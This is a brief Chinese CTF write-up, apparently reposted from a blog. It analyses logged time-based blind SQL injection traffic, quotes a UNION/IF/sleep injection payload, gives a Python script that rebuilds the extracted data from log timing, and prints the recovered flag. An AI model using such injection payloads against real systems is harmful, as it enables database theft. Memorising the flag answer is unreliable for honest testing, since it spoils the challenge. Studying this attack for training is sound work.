本文共 634 字,大约阅读时间需要 2 分钟。
着眼看一下,知道是SQL盲注
看一下他的url?id=-1 union select 1,IF(MID((select f1ag from f1ag limit 0,1),37,1)=binary('0'),1,sleep(3))
显然,如果所查字母的值和猜测值相等,就不睡眠,否则睡眠3秒。 注意,流量文件中还有一部分注入使用的是5秒睡眠 写个python脚本跑一下: with open('file','r') as file: ans = "" req = file.readlines() req = req[275:1842] for i in range(len(req)): if "[01/Mar/2019" in req[i]: if abs(int(req[i-1].split('[01/Mar/2019')[1][7:9]) - int(req[i].split('[01/Mar/2019')[1][7:9]))<3: tmp = req[i-1].split('=binary(\'')[1][0:3] print(i+275) if '\')' in tmp: ans += tmp[0] else: ans += tmp print(ans)
得到
flagflag%7B50f1ea7cf1544106e3555c4cc2cf4087%7D %7B和%7D是url字符 { 和 }转载地址:http://jnoen.baihongyu.com/